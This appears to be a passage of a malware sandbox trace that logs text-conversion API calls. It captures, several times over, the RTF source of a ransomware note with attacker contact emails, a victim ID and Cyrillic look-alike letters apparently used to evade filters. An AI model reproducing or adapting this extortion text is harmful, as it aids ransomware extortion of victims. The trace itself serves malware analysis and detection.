\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0071.059] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1e971a8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 